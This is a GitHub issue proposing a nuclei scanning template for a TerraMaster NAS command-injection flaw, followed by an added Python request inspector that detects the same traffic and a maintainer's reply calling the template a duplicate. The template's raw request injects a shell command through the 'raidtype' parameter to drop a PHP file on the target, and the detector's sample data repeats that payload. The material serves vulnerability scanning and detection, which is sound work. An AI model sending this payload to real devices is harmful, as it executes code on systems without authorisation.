projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License

TerraMaster-RCE #7895

Closed momika233 closed 1 year ago

momika233 commented 1 year ago

Template Information:

An attacker can exploit the vulnerable endpoint "api.php?mobile/webNasIPS", which exposes sensitive information such as administrator password hashes and MAC addresses. This would result in an attacker being able to achieve unauthenticated access. In addition, an attacker can also use another vulnerable endpoint, "api.php?mobile/createRaid", and the POST parameters "raidtype" and "diskstring" to execute remote code as root on TerraMaster NAS devices.

Nuclei Template:

id: TerraMaster-RCE

info:
  name: TerraMaster NAS 4.2.x < 4.2.30
  author: momika233
  severity: high
  description: An attacker can exploit the vulnerable endpoint "api.php?mobile/webNasIPS", which exposes sensitive information such as administrator password hashes and MAC addresses. This would result in an attacker being able to achieve unauthenticated access. In addition, an attacker can also use another vulnerable endpoint, "api.php?mobile/createRaid", and the POST parameters "raidtype" and "diskstring" to execute remote code as root on TerraMaster NAS devices.
  reference:
    - https://www.exploit-db.com/exploits/50635
  metadata:
    fofa-query: "TerraMaster"
    verified: true
    max-request: 2

  tags: TerraMaster-NAS,RCE

requests:
  - raw:
      - |
        POST /module/api.php?mobile/createRaid HTTP/1.1
        Host: {{Hostname}}
        User-Agent: TNAS
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close
        Authorization: $1$a8HTkWlu$3SwnF1UFzWRy04O/rpMg0/
        Signature: 06a1e2bf6a758050651c8897845468dd
        Timestamp: 1690190727
        Content-Length: 82
        Content-Type: application/x-www-form-urlencoded

        raidtype=%3Becho+%22%3C%3Fphp+phpinfo%28%29%3B%3F%3E%22%3Emomika233.php&diskstring=XXXX
      - |
        GET /module/momika233.php HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<title>phpinfo()"
        part: body

      - type: status
        status:
          - 200

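As an added example (not part of this issue or of the nuclei-templates project), a small request inspector a defender could run over proxy or WAF request records to flag the two endpoints named above: hits on mobile/webNasIPS, shell metacharacters in the createRaid POST parameters, and requests for unexpected .php files under /module/. The endpoint paths follow the posted template; the tag names and the sample traffic are constructed.

```python
import re
from urllib.parse import parse_qs

# Endpoint paths as they appear in the posted template; tag names are our own.
API_PATH = "/module/api.php"
INFO_ENDPOINT = "mobile/webNasIPS"
RAID_ENDPOINT = "mobile/createRaid"
INJECTABLE_PARAMS = ("raidtype", "diskstring")
SHELL_META = re.compile(r"[;&|`$<>\n]")


def inspect_request(method: str, target: str, body: str = "") -> list[str]:
    """Return detection tags for one HTTP request (constructed inspector, not nuclei)."""
    findings = []
    path, _, query = target.partition("?")
    if path == API_PATH and query == INFO_ENDPOINT:
        # Any reachable hit is notable: the endpoint discloses the admin hash and MAC.
        findings.append("webNasIPS-access")
    if path == API_PATH and query == RAID_ENDPOINT and method.upper() == "POST":
        # parse_qs undoes percent-encoding and '+', so an encoded ';' is still caught.
        params = parse_qs(body, keep_blank_values=True)
        for key in INJECTABLE_PARAMS:
            if any(SHELL_META.search(v) for v in params.get(key, [])):
                findings.append(f"createRaid-shell-metachar-in-{key}")
    if path.startswith("/module/") and path.endswith(".php") and path != API_PATH:
        # A new .php file under /module/ is how the template confirms code execution.
        findings.append("unexpected-php-under-module")
    return findings


# Constructed sample traffic: one benign RAID call plus the three patterns from the template.
SAMPLE_REQUESTS = [
    ("POST", "/module/api.php?mobile/createRaid", "raidtype=raid1&diskstring=sda,sdb"),
    ("GET", "/module/api.php?mobile/webNasIPS", ""),
    ("POST", "/module/api.php?mobile/createRaid",
     "raidtype=%3Becho+%22%3C%3Fphp+phpinfo%28%29%3B%3F%3E%22%3Emomika233.php&diskstring=XXXX"),
    ("GET", "/module/momika233.php", ""),
]


def scan(requests=SAMPLE_REQUESTS) -> dict[int, list[str]]:
    """Map request index -> findings, dropping requests with nothing to report."""
    return {i: f for i, (m, t, b) in enumerate(requests) if (f := inspect_request(m, t, b))}


if __name__ == "__main__":
    for idx, tags in scan().items():
        print(idx, SAMPLE_REQUESTS[idx][1], tags)
```

The benign createRaid call (index 0) produces no finding, so the endpoint alone is not treated as an alert; only the metacharacter, the disclosure endpoint and the dropped .php file are.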
DhiyaneshGeek commented 1 year ago

Hi @momika233, this seems to be a duplicate of http/cves/2022/CVE-2022-24990.yaml. Let me know if I'm wrong.

Looking forward to hearing back from you :)

momika233 commented 1 year ago

o